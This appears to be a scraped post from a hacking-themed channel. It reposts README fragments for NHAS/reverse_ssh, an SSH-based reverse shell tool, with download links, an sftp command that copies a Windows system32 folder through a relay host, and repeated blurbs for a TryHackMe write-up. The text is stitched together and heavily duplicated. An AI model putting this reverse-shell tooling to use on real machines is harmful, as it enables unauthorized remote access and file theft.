Windows and SFTP Due to the limitations of SFTP (or rather the library Im using for it). Paths need a little more effort on windows. sftp -r -J your.rssh.server.com:3232 test-pc.user.test-pc:'/C:/Windows/system32'
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Tools | Kitploit
Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!
Note the / before the starting character. Foreground vs Background (Important note about clients) By default, clients will run in the background. When started they will execute a new background instance (thus forking a new child process) and then the parent process will exit. If the fork is successful the message "Ending parent" will be printed. This has one important ramification: once in the background a client will not show any output, including connection failure messages. If you need to debug your client, use the --foreground flag.
Download Reverse_Ssh (https://github.com/NHAS/reverse_ssh)
___________________________
@hacking_Attack
@Hacking_Video
Download Reverse_Ssh (https://github.com/NHAS/reverse_ssh)
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - NHAS/reverse_ssh: SSH based reverse shell
SSH based reverse shell . Contribute to NHAS/reverse_ssh development by creating an account on GitHub.
Hacking on Medium
TryHackme | Corridor — Write-up
This is a write up for the easy room — Corridor
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackme | Corridor — Write-up
This is a write up for the easy room — Corridor
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackme | Corridor — Write-up
This is a write up for the easy room — Corridor